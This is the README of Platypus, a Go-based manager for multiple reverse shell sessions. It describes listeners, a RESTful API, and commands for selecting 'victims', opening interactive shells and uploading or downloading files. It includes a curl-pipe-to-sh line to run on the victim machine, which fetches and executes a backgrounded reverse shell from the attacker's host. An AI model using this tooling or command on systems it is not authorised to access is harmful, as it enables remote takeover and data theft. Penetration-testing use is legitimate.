## Platypus ![Language](https://img.shields.io/badge/Language-Golang-blue) ![Author](https://img.shields.io/badge/Author-WangYihang-orange) ![GitHub stars](https://img.shields.io/github/stars/WangYihang/Platypus.svg?style=flat&logo=github) ![Version](https://img.shields.io/badge/Version-V1.5.0-red) ![Time](https://img.shields.io/badge/Join-20210702-green) A modern multiple reverse shell sessions/clients manager via terminal written in go ## Features - [x] Multiple service listening port - [x] Multiple client connections - [x] [RESTful API](./doc/RESTful.md) - [x] [Python SDK](https://github.com/WangYihang/Platypus-Python) - [x] [Reverse shell as a service](/doc/RaaS.md) (Pop a reverse shell in multiple languages without remembering idle commands) - [x] Download/Upload file with progress bar - [x] Full interactive shell - [x] Using vim gracefully in reverse shell - [x] Using CTRL+C and CTRL+Z in reverse shell - [x] Start servers automatically - [x] Port forwarding - [x] Initialize from configuration file - [x] Web UI ## Documents * [Chinese | 中文文档](https://platypus-reverse-shell.vercel.app/) ## Get Start > There are multiple ways to run this tool, feel free to choose one of the following method. ### Install requirements for running (Optional) ``` sudo apt install upx ``` ### Run Platypus from source code ```bash git clone https://github.com/WangYihang/Platypus cd Platypus sudo apt install -y make curl make install_dependency make release ``` ### Run Platypus from docker-compose ```bash docker-compose up -d # Method 1: enter the cli of platypus docker-compose exec app tmux a -t platypus # Method 2: enter the web ui of platypus firefox http://127.0.0.1:7331/ ``` ### Run Platypus from release binaries 1. Download `Platypus` prebuild binary from [HERE](https://github.com/WangYihang/Platypus/releases) 2. Run the downloaded executable file ## Usage ### Network Topology * Attack IP: `192.168.88.129` * Reverse Shell Service: `0.0.0.0:13337` * Reverse Shell Service: `0.0.0.0:13338` * RESTful Service: `127.0.0.1:7331` * Victim IP: `192.168.88.130` ### Give it a try First, run `./Platypus`, then the `config.yml` will be generated automatically, and the config file is simple enough. ```yaml servers: - host: "0.0.0.0" port: 13337 # Platypus is able to use several properties as unique identifier (primirary key) of a single client. # All available properties are listed below: # `%i` IP # `%u` Username # `%m` MAC address # `%o` Operating System # `%t` Income TimeStamp hashFormat: "%i %u %m %o" - host: "0.0.0.0" port: 13338 # Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC. hashFormat: "%i %u %m %o %t" restful: host: "127.0.0.1" port: 7331 enable: true # Check new releases from GitHub when starting Platypus update: false ``` ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/start.gif) As you can see, platypus will check for updates, then start listening on port 13337, 13338 and 7331 The three port have different aims. - 13337 Reverse shell server, which **disallows** the reverse session comes from the IP. - 13338 Reverse shell server, which **allows** the reverse session comes from the IP. - 7331 Platypus [RESTful](https://github.com/WangYihang/Platypus/blob/master/doc/RESTful.md) API EndPoint, which allows you to manipulate Platypus through HTTP protocol or [Python SDK](https://github.com/WangYihang/Platypus/blob/master/doc/SDK.md). If you want another reverse shell listening port, just type `Run 0.0.0.0 1339` or modify the `config.yml`. Also, platypus will print help information about [RaaS](https://github.com/WangYihang/Platypus/blob/master/doc/RaaS.md) which release you from remembering tedious reverse shell commands. With platypus, all you have to do is just copy-and-paste the `curl` command and execute it on the victim machine. ```bash curl http://127.0.0.1:13337/|sh curl http://192.168.88.129:13337/|sh ``` Now, suppose that the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/connect.gif) > Notice, the RaaS feature ensure that the reverse shell process is running in background and ignore the hangup signal. ## Get start with Web UI ### Manage listening port ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/webui/add.gif) ### Wait for client connection ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/webui/wait) ### Popup an interactive shell ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/webui/shell.gif) ### Upgrade a reverse shell to an encrypted channel (Termite) ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/webui/upgrade.gif) ## Get start with cli ### List all victims You can use `List` command to print table style infomation about all listening servers and connected clients. Notice that the port `13337` will reset the connection from the same machine (we consider two connection are same iff they share the same Hash value, the info being hash can be configured in `config.yml`). Port `13338` will not reset such connections, which provide more repliability. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/list.gif) ### Select a victim `Jump` command can take you a tour between clients. Use `Jump [HASH / Alias]` to jump. `Alias` is a alias of a specific client, you can set a alias of a client via `Alias [ALIAS]`. Also, for jumping through `HASH`, you do not need to type the whole hash, just prefix of hash will work. > All commands are case insensitive, feel free to use tab for completing. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/jump.gif) ### Interactive shell `Interact` will popup a shell, just like `netcat`. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/interact.gif) ### Download file Use `Download` command to download file from reverse shell client to attacker's machine. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/download.gif) ### Upload file Use `Upload` command to upload file to the current interacting client. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/upload.gif) ### Interactive shell mode > This feature only works on *nix clients > For your user experience, we highly RECOMMEND you use `Upgrade` command to upgrade the plain reverse shell to a encrypted interactive shell. Try to Spawn `/bin/bash` via Python, then the shell is fully interactive (You can use vim / htop and other stuffs). First use `Jump` to select a client, then type `PTY`, then type `Interact` to drop into a fully interactive shell. ~~You can just simply type `exit` to exit pty mode~~, to avoid the situation in [issue #39](https://github.com/WangYihang/Platypus/issues/39), you can use `platyquit` to quit the fully interactive shell mode. ![](https://github.com/WangYihang/Platypus/raw/master/docs/zh/docs/images/cli/interactive.gif) ## Advanced [Usages](https://github.com/WangYihang/Platypus/blob/master/doc) * Reverse shell as a Service (RaaS) * RESTful API * Python SDK ## 项目相关 ## 最近更新